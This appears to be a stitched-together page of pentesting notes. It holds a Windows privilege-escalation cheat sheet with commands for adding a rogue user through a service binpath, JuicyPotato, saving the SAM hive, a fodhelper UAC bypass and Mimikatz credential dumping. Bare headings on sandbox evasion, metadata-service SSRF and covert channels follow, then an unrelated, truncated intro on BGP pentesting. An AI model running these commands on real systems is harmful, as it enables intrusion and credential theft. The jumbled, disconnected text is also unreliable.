Post-engagement cleanup and attestations - Provide confirmation of artifact removal and account deactivation.

| # | Trick | Command / Technique |
|---|-------|----------------------|
| 31 | AlwaysInstallElevated MSI | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer |
| 32 | Unquoted service paths | wmic service get name,displayname,pathname,startmode |
| 33 | Weak service permissions (sc.exe) | sc config SERVICE binpath="cmd.exe /c net user hacker pass /add" |
| 34 | SeImpersonate (Potato family) | JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami" |
| 35 | Saved RDP credentials | cmdkey /list → runas /savecred |
| 36 | SAM & SYSTEM backup | reg save hklm\sam sam.save |
| 37 | Writable %PATH% folders | where.exe check + drop whoami.exe |
| 38 | PrintNightmare (CVE-2021-34527) | MS-RPRN → SharpPrintNightmare.exe |
| 39 | UAC bypass – fodhelper | reg add HKCU\Software\Classes\ms-settings\shell\open\command |
| 40 | Logon scripts from registry | reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" |
| ... | ... | ... |
| 60 | Mimikatz sekurlsa | sekurlsa::logonpasswords |

Anti-VM and sandbox detection in payloads - Detect virtualization artifacts before payload activation.
Metadata service SSRF to steal credentials (AWS/GCP) - Target 169.254.169.254 for AWS; craft SSRF payloads to retrieve tokens.
Covert channels using ICMP, HTTP, or DNS
In the cybersecurity community, "HackTricks 179" typically refers to the pentesting methodology for port 179, which is the default port for the Border Gateway Protocol (BGP). HackTricks is a widely used knowledge base that documents vulnerabilities and exploitation techniques for various network services.

Securing the Backbone: Pentesting Port 179 (BGP)
Port 179 is used by BGP to establish "peering" sessions between —large networks like ISPs and tech giants—to share routing tables. Protocol: TCP (Transmission Control Protocol).